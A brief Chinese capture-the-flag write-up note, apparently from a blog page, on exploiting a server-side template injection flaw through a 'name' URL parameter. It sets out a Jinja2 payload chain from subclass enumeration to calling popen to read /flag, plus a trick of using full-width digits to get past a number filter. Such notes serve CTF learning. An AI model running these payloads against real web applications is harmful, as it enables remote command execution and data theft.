赞
踩
?name={{"".__class__.__bases__[0].__subclasses__()}}
一直到这一步都是正常的
从12开始就没用了
数字出现了问题,看wp用全角数字代替正常数字绕过
?name={{"".__class__.__bases__[0].__subclasses__()[132]}}
然后应该可以用正常方法做了
?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。